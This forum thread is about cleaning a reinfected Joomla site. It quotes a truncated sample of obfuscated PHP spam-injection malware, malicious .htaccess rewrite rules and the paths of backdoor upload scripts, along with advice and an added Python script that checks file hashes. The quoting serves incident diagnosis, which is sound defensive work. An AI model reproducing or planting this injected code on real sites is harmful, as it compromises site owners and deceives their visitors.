@set_time_limit(0);
$xmlname = 'mapss.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER['REQUEST_URI'])){
$smuri = $_SERVER['REQUEST_URI'];
}else{
if(isset($_SERVER['argv'])){
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
}else{
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}
}
return $smuri;
}
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO
.... more lines of code ....
MDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. The only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
Webmaster wrote: Hi Jeff,
Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. The only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
This is really odd; even a single character modified changes the hash value and you should be alerted...
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)\/([0-9]+)_(.*)..*$ ?$2$3=$1&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\?.*=.*-JP$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^(.*)\/([^\d\/]+)\/([0-9]+)\/([0-9]+)\/.*\/.*\/.*\/.*..*$ ?$2$3=$4&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]
Webmaster wrote: I have checked the zipped file attached and I think there are still some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so a hacker can use them to upload new backdoors.
Webmaster wrote: Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead of a complete re-install.
Regards,
Jose
Yes, I did some improvements in the site. I apologize about that.
I tried to post the other day, but it kept giving me an error, then could not even access your site for a while...
Maybe hackers change the timestamp, but even if this happens the hash value should change and the extension should warn you.
The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)
I think this is an automated task of your hosting provider; please, read this forum entry
Another interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am every day
Or your website or the server is still infected; do you have a shared hosting or a dedicated server?
I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...
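The point made in this thread, that a restored timestamp does not hide a content change from a hash comparison and that a permission flip from 0444 back to 0644 is itself a signal, shown as an added example. It is not part of the original posts and not the code of the extension discussed here; the function names `snapshot`, `compare` and `demo` are hypothetical, and the `index.php` contents are constructed sample data.

```python
import hashlib
import os
import tempfile

def snapshot(root):
    """Map each relative path under root to (sha256 hex, permission bits, mtime_ns)."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            state[os.path.relpath(path, root)] = (digest, st.st_mode & 0o7777, st.st_mtime_ns)
    return state

def compare(baseline, current):
    """Return {path: [findings]} for every file that differs from the baseline."""
    findings = {}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline or rel not in current:
            findings[rel] = ["new file" if rel in current else "deleted"]
            continue
        (h0, m0, t0), (h1, m1, t1) = baseline[rel], current[rel]
        notes = []
        if h0 != h1:  # the hash is the authority; mtime is only reported as context
            notes.append("content changed" + (" (mtime unchanged)" if t0 == t1 else ""))
        if m0 != m1:
            notes.append("mode %04o -> %04o" % (m0, m1))
        if notes:
            findings[rel] = notes
    return findings

def demo():
    """Constructed scenario: file is rewritten, old mtime put back, mode left at 0644."""
    with tempfile.TemporaryDirectory() as root:
        target = os.path.join(root, "index.php")
        with open(target, "w") as fh:
            fh.write("<?php // clean constructed sample\n")
        os.chmod(target, 0o444)
        baseline = snapshot(root)
        st = os.stat(target)
        os.chmod(target, 0o644)  # the file owner can always make it writable again
        with open(target, "a") as fh:
            fh.write("// constructed injected line\n")
        os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))  # restore old timestamp
        return compare(baseline, snapshot(root))

if __name__ == "__main__":
    print(demo())
```

Because 0444 does not stop a process running as the file's owner, the baseline should be stored where the web server user cannot write to it.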